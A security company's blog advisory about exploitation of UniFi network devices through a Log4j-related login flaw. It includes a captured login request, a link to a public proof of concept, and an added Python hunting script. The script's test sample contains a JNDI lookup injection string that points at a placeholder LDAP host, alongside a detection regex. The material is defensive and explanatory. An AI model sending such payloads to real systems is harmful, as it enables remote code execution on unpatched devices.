Remote Code Execution on UniFi devices




Posted on 2022-01-29 by Peter Bassill in category Penetration Testing.




We are currently monitoring several exploited UniFi network appliances throughout Gibraltar. A new exploit against UniFi network devices, of which there is a large number within Gibraltar, was observed on the 20th of January of this year. We became aware today that an exploit has been published on the internet and is now in general circulation. I expect to start to see wide-scale exploitation of these appliances in the next five days.

Why is this an issue?

On the 23rd of January we provided a working Proof of Concept exploit to the vendor that would allow an unauthenticated attacker to bypass security controls and join protected networks.

What we have been seeing in a number of cases is the following:

    POST /api/login HTTP/2
    Host: 192.168.77.1
    Content-Length: 109
    Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
    ...

    {"username":"testpoc","password":"anything","remember":"","strict":true}

For an in-depth look at how this exploit works, and to get a working PoC, check out the work by puzzlepeaches at https://github.com/puzzlepeaches/Log4jUnifi
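A hunting check for captured requests like the one above, as an added example that is not from the original post or from the linked repository: it flags `POST /api/login` bodies whose username matches the observed request or whose string fields contain Log4j lookup syntax (`${`). The lookup check is an assumption taken from the name of the linked Log4jUnifi repository; the function names and the sample requests are constructed for illustration.

```python
import json
import re

LOOKUP = re.compile(r"\$\{")        # start of any Log4j lookup, nested or not (assumption)
OBSERVED_USERNAMES = ("testpoc",)   # from the request shown in this post

def parse_request(raw):
    """Split a raw HTTP request into (method, path without query, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n")[0].split(" ")
    if len(parts) != 3:
        return None, None, ""
    return parts[0], parts[1].split("?")[0], body.strip()

def string_values(node, path=""):
    """Yield (json_path, value) for every string anywhere in the JSON body."""
    if isinstance(node, dict):
        for key, val in node.items():
            yield from string_values(val, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from string_values(val, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node

def check_login_request(raw):
    """Return findings for one captured request (empty list = nothing flagged)."""
    method, path, body = parse_request(raw)
    if method != "POST" or path != "/api/login":
        return []
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return ["lookup syntax in unparseable body"] if LOOKUP.search(body) else []
    findings = [f"lookup syntax in field '{p}'"
                for p, v in string_values(doc) if LOOKUP.search(v)]
    if isinstance(doc, dict) and doc.get("username") in OBSERVED_USERNAMES:
        findings.append("username matches the observed request")
    return findings

# Constructed samples: request mirroring the post, then one with a lookup string.
SAMPLES = [
    'POST /api/login HTTP/2\nHost: 192.168.77.1\n\n'
    '{"username":"testpoc","password":"anything","remember":"","strict":true}',
    'POST /api/login HTTP/2\nHost: 192.168.77.1\n\n'
    '{"username":"${jndi:ldap://example.invalid/a}","password":"x"}',
]
for sample in SAMPLES:
    print(check_login_request(sample))
```

Request bodies are not normally written to access logs, so the input has to come from a reverse proxy or packet capture that retains them.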

What do people need to do?

If you use UniFi or any Ubiquiti application, contact your IT support company and ensure that the devices have been updated to the latest version. If you are unsure of whether your devices need to be updated, contact us at support@wearehedgehog.com and we will check for you.

As always, Hedgehog Security and our CERT team are here to help. If you have any questions, just let us know. We love talking about penetration testing and cyber security.

